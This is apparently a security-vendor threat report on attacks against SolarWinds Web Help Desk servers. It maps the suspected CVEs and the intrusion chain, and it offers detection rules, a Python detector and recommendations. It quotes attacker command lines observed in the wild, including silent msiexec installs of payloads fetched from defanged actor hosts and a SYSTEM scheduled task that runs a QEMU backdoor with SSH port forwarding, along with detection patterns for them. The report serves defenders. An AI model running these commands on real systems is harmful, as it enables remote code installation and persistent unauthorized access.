Summary
- On February 6, 2026, Microsoft reported the exploitation of SolarWinds Web Help Desk (WHD) servers
- The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access
- While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551
- Elastic Security Labs has not observed telemetry events related to this activity as of the date of this publication
- Elastic Defend provides comprehensive visibility, along with 5 prebuilt prevention and 11 prebuilt detection capabilities across this reported activity
Background
Multiple intrusions have been publicly reported starting on February 6, 2026 stemming from Internet-connected servers utilizing SolarWinds Web Help Desk software. This exploitation activity reportedly first occurred in December 2025.
Given the number of recent CVEs affecting this product, it’s not yet clear which of them is directly responsible for these campaigns. The CVEs potentially involved in this reported activity are:
- CVE-2025-26399: SolarWinds Web Help Desk AjaxProxy Deserialization of Untrusted Data Remote Code Execution Vulnerability
- CVE-2025-40536: SolarWinds Web Help Desk Security Control Bypass Vulnerability
- CVE-2025-40551: SolarWinds Web Help Desk Deserialization of Untrusted Data Remote Code Execution Vulnerability
Below is a table of the vulnerability descriptions and the impacted product versions:
| Vulnerability ID | Vulnerability Description | Affected Products |
|---|---|---|
| CVE-2025-26399 | Unauthenticated AjaxProxy deserialization remote code execution vulnerability | SolarWinds Web Help Desk 12.8.7 and all previous versions |
| CVE-2025-40536 | Susceptible to a security control bypass vulnerability | SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions |
| CVE-2025-40551 | Untrusted data deserialization vulnerability | SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions |
After exploitation, the threat actors are documented to have abused otherwise legitimate RMM software to gain persistent access to victim environments. Additional reporting noted that Velociraptor was abused for post-compromise execution, such as disabling Microsoft Defender and setting up a Cloudflare tunnel.
Once the threat actors had gained network access, they configured a scheduled task to start a QEMU virtual machine to maintain remote access. Credential dumping activity was also observed, including the use of DCSync and the extraction of the NTDS.dit database from a Windows domain controller.
The following sections detail Elastic Security detection and prevention rules that can detect and mitigate these intrusive activities.
Execution Flow
Initial access
Following the successful exploitation of the SolarWinds Web Help Desk (WHD), the threat actors established an interactive shell. Observations indicate a heavy reliance on "living-off-the-land" (LotL) techniques, where legitimate system utilities and programs such as RMMs are used to perform malicious actions.
The original attack chain begins with the WHD service wrapper (wrapper.exe) spawning java.exe, which then spawns the Windows command processor (cmd.exe). An Elastic SIEM rule has been created for the community to detect unusual child process activity from the SolarWinds Web Help Desk application.
```eql
any where host.os.type == "windows" and
(
  (event.category == "library" and
   process.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe") and
   (dll.path : "\\Device\\Mup\\*" or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or
  (event.category == "process" and process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
   process.parent.executable : ("C:\\Program Files\\WebHelpDesk\\*\\java*.exe", "C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe"))
)
```
SIEM Rule - Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
One of the initial attack chains involved installing a remotely hosted MSI package from an anonymous file-hosting service called Catbox. The following command line was observed:
```
msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
```
To detect this activity, Elastic provides a prebuilt SIEM rule for remote installation of MSI files and an endpoint behavior protection for the same technique; both are listed in the detection sections at the end of this article.
Suspicious child processes from Java and SolarWinds WHD represent the earliest phase of this attack, which resulted in the installation of an RMM MSI file. This remote monitoring and management utility provides some of the functionality of a conventional backdoor while resembling benign administrative software.
Discovery
After the RMM agent was configured, the threat group moved to hands-on-keyboard activity, performing reconnaissance and discovery within the network.
They then used the RMM agent to run discovery commands against Active Directory within the Windows network. An observed command line is shown below:
```
net group "domain computers" /do
```
An existing SIEM rule designed to identify Windows account or group discovery detects this reconnaissance technique and is listed in the detection sections below.
Evasion
One of the more notable choices made by the threat actor in one campaign was the use of the open-source forensic tool Velociraptor. While this legitimate tool is traditionally used to collect forensic artifacts from endpoints, the adversaries used it for code execution and file staging. The threat group silently installed Velociraptor using the remote MSI command shown below; the prebuilt Elastic Security rules for remote MSI installation cover this command:
```
msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
```
They followed this up with an installation of the Cloudflare Tunnel client (cloudflared) using the following command:
```
msiexec /q /i hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi
```
Echoing trends observed throughout 2025 and described in the Elastic Global Threat Report, adversaries increasingly abuse trusted infrastructure both for encrypted transport and to benefit from its benign reputation. The remote MSI installation rules discussed earlier in this article also apply in this case; however, installing a legitimate security tool is likely to appear benign to many enterprises. Cisco Talos has previously highlighted this emerging attacker trend involving the use of Velociraptor for post-compromise activity.
Other observations in this intrusion set included the threat actor disabling security controls such as Windows Defender and Windows Firewall through registry key modifications. Existing Elastic SIEM and endpoint rules identify these attempts to undermine security settings.
Persistence
In order to maintain continued access, the threat actors set up a Windows scheduled task using the following command line (the user name is redacted as <user>):
```
SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" /TR "C:\Users\<user>\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"
```
This scheduled task, named TPMProfiler, runs as SYSTEM at every boot and executes QEMU, a system-level virtualization and emulation tool, booting the disk image vault.db. The hostfwd option forwards TCP port 22022 on the host to port 22 inside the guest, so an SSH connection to the host on that port lands inside the virtual machine, facilitating continued access to the compromised system.
Elastic Security published and maintains a SIEM detection rule to detect the creation of this scheduled task.
To detect the QEMU tunnelling activity, Elastic Security provides an Elastic Defend prevention rule and a prebuilt SIEM detection rule, both listed in the detection sections below.
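As an added illustration (not Elastic's rule code), the following Python script mirrors three of the behaviours discussed above, the process branch of the WHD child-process EQL rule from the Initial access section, remote MSI installation, and the QEMU scheduled task from this section, and parses the hostfwd port mapping from the task action. It runs over constructed ECS-style process events; hosts, paths and user names in those events are placeholders, not real telemetry.

```python
import re

# Constructed sample process-creation events modelled on the command lines quoted in
# this report; hosts, paths and user names are placeholders, not real telemetry.
EVENTS = [
    {"process.parent.executable": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "process.name": "cmd.exe", "process.command_line": "cmd.exe /c whoami"},
    {"process.parent.executable": r"C:\Windows\System32\cmd.exe", "process.name": "msiexec.exe",
     "process.command_line": "msiexec /q /i https://files.example.test/tmp9fc.msi"},
    {"process.parent.executable": r"C:\Windows\System32\cmd.exe", "process.name": "schtasks.exe",
     "process.command_line": 'SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN "TPMProfiler" '
                             '/TR "C:\\Users\\bob\\tmp\\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db '
                             '-device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22"'},
    {"process.parent.executable": r"C:\Windows\explorer.exe", "process.name": "msiexec.exe",
     "process.command_line": r"msiexec /q /i C:\installers\local-app.msi"},  # local install, benign
]

# java*.exe under either WebHelpDesk install root, as in the EQL rule's process branch.
WHD_JAVA = re.compile(r"^C:\\Program Files( \(x86\))?\\WebHelpDesk\\.*\\java[^\\]*\.exe$", re.I)
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe"}
# msiexec /i pointed at an http(s) URL rather than a local package path.
REMOTE_MSI = re.compile(r"\bmsiexec(\.exe)?\b.*\s/i\s+https?://", re.I)
# Task action that launches qemu-system with a user-mode network port forward.
QEMU_TUNNEL = re.compile(r"qemu-system[^\s\"]*\.exe.*hostfwd=", re.I)
HOSTFWD = re.compile(r"hostfwd=(tcp|udp):[^:,\s]*:(\d+)-[^:,\s]*:(\d+)", re.I)

def detect(event):
    """Return the names of the report's behaviours that one ECS-style event matches."""
    hits = []
    parent = event.get("process.parent.executable", "")
    name = event.get("process.name", "").lower()
    cmd = event.get("process.command_line", "")
    if name in SUSPICIOUS_CHILDREN and WHD_JAVA.match(parent):
        hits.append("whd_suspicious_child_process")
    if name == "msiexec.exe" and REMOTE_MSI.search(cmd):
        hits.append("remote_msi_install")
    if name == "schtasks.exe" and "/create" in cmd.lower() and QEMU_TUNNEL.search(cmd):
        hits.append("scheduled_task_qemu_tunnel")
    return hits

def qemu_hostfwd_ports(cmd):
    """Extract (protocol, host_port, guest_port) tuples from QEMU hostfwd options."""
    return [(p.lower(), int(h), int(g)) for p, h, g in HOSTFWD.findall(cmd)]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["process.name"], detect(ev), qemu_hostfwd_ports(ev["process.command_line"]))
```

The fourth event, a local MSI install, produces no hit, which is the distinction the remote-install rules rely on.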
Credential Access
As part of these attacks, Microsoft also mentioned credential dumping of the Active Directory domain database (ntds.dit). Elastic provides multiple detections for this behavior, including the NTDS and credential access rules listed in the detection sections below.
Recommendations
- Apply the latest SolarWinds Web Help Desk patches.
- Rotate all service and administrative credentials that are associated with SolarWinds Web Help Desk.
- Conduct host-level reviews of any impacted servers and endpoints to identify unauthorized activity.
- Identify and remove any RMM usage associated with this activity. Review organizational policy and monitoring strategies for RMM tools.
Detecting SolarWinds WHD exploitation
Elastic Security prebuilt detection rules
- Suspicious SolarWinds Web Help Desk Java Module Load or Child Process
- Potential Remote Install via MsiExec
- Remote File Execution via MSIEXEC
- Windows Account or Group Discovery
- Windows Defender Disabled via Registry Modification
- Persistence via Scheduled Job Creation
- NTDS or SAM Database File Copied
- Potential Credential Access via Windows Utilities
- Attempt to Establish VScode Remote Tunnel
- First Time Seen Commonly Abused Remote Access Tool Execution
- Potential Traffic Tunneling using QEMU
Elastic Defend prebuilt prevention rules
- Remote File Execution via MSIEXEC
- Suspicious Windows Defender Registry Modification
- Potential Traffic Tunneling with QEMU
- Connection to WebService by a Signed Binary Proxy
- Attempt to establish VScode Remote Tunnel
References
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | PowerShell | T1059.001 |
| Lateral Movement | Remote Service Session Hijacking | T1563 |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 |
| Persistence | Scheduled Task/Job | T1053.005 |
